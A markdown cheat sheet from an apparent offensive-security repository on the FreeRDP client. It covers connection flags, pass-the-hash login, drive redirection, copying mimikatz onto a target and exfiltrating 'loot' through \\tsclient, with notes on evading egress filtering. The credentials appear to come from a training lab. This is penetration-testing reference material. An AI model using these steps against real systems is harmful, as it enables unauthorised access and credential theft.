daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

xfreerdp.md (4564B)


      1 ---
      2 title: "xfreerdp"
      3 description: "FreeRDP command-line RDP client โ€” connection flags, drive redirection, and finding the \\tsclient shared folder from a CLI-only Windows session."
      4 category: tools
      5 tags: ["tools", "rdp", "lateral-movement", "file-transfers"]
      6 tools: ["FreeRDP"]
      7 difficulty: beginner
      8 updated: "2026-08-29"
      9 ---
     10 # ๐Ÿ–ฅ๏ธ xfreerdp Cheat Sheet
     11 
     12 ***
     13 
     14 ## ๐Ÿ“– Connecting
     15 
     16 ```bash
     17 # โ”€โ”€ Basic connection โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     18 xfreerdp3 /v:172.16.8.20 /u:hporter /p:'Gr8hambino!'
     19 
     20 # โ”€โ”€ Domain account + port + ignore cert prompts โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     21 xfreerdp3 /v:172.16.8.20:3389 /d:inlanefreight.local /u:hporter /p:'Gr8hambino!' /cert:ignore
     22 
     23 # โ”€โ”€ Pass-the-hash โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     24 xfreerdp3 /v:172.16.8.20 /u:hporter /pth:2b576acbe6bcfda7294d6bd18041b8fe /cert:ignore
     25 
     26 # โ”€โ”€ Useful quality-of-life flags โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     27 xfreerdp3 /v:172.16.8.20 /u:hporter /p:'Gr8hambino!' \
     28   /cert:ignore \            # don't prompt on self-signed certs
     29   +clipboard \              # shared clipboard both ways
     30   /dynamic-resolution \     # resize window = resize session
     31   /size:1920x1080 \         # or fixed resolution ( /f for fullscreen )
     32   /admin                    # console session (mstsc /admin equivalent)
     33 ```
     34 
     35 > โš ๏ธ FreeRDP warns that `/p` exposes the password in the process list. Use `/args-from:file` (all flags in a file) or omit `/p` and type it at the prompt on shared systems.
     36 
     37 ***
     38 
     39 ## ๐Ÿ“ Drive Redirection โ€” Share a Local Folder
     40 
     41 ```bash
     42 # โ”€โ”€ Share /home/daemon-sec/void as a drive named "home" โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     43 xfreerdp3 /v:172.16.8.20 /u:hporter /p:'Gr8hambino!' \
     44   /drive:home,/home/daemon-sec/void
     45 
     46 # โ”€โ”€ Path with spaces: quote the whole path part โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     47 xfreerdp3 /v:172.16.8.20 /u:hporter /p:'Gr8hambino!' \
     48   /drive:tools,"/home/daemon-sec/voidwalker/tools/windows/ad"
     49 
     50 # โ”€โ”€ Syntax:  /drive:<NAME_ON_WINDOWS>,<LOCAL_LINUX_PATH> โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     51 ```
     52 
     53 The **name** you choose (`home`, `tools`, โ€ฆ) is how the share appears on the Windows side.
     54 
     55 ***
     56 
     57 ## ๐Ÿ” Finding the Shared Folder on Windows
     58 
     59 ### GUI session
     60 
     61 Open **Explorer โ†’ This PC** โ€” the share shows up as a *Redirected drive* named e.g. `home on AZRAEL`. It's also reachable directly via the UNC path below.
     62 
     63 ### CLI-only session (Server Core, restricted desktop, `cmd.exe` window)
     64 
     65 The share is **not** a drive letter โ€” it lives under the `\\tsclient\` UNC path:
     66 
     67 ```cmd
     68 :: List all redirected drives (name you passed to /drive:)
     69 dir \\tsclient\
     70 
     71 :: Browse the share
     72 dir \\tsclient\home
     73 
     74 :: Copy tool from Kali โ†’ target
     75 copy \\tsclient\home\mimikatz.exe C:\Temp\mimikatz.exe
     76 
     77 :: Exfiltrate loot target โ†’ Kali
     78 copy C:\Temp\loot.txt \\tsclient\home\loot.txt
     79 ```
     80 
     81 ```powershell
     82 # โ”€โ”€ PowerShell equivalents โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     83 Get-ChildItem \\tsclient\home
     84 Copy-Item \\tsclient\home\tool.exe C:\Temp\
     85 Copy-Item C:\Temp\loot.txt \\tsclient\home\
     86 
     87 # โ”€โ”€ See redirected drives as PSDrives โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     88 net use
     89 Get-PSDrive -PSProvider FileSystem
     90 ```
     91 
     92 > ๐Ÿ’ก **No `\\tsclient` showing?** Drive redirection can be disabled by GPO (*Do not allow drive redirection*) or you forgot `/drive:` on connect โ€” disconnect and reconnect with it. Also try `net use` to confirm what the session actually mounted.
     93 
     94 ***
     95 
     96 ## ๐ŸŽฏ Why This Beats Other Transfer Methods
     97 
     98 - **No extra listener** โ€” rides inside the RDP session itself, no SMB/HTTP server needed
     99 - **Bidirectional** โ€” same share for uploading tools and pulling loot
    100 - **Works when egress is filtered** โ€” port 3389 is already allowed
    101 - **+clipboard** handles small text loot (hashes, creds) with zero files
    102 
    103 ***
    104 
    105 > โœ… **xfreerdp complete.**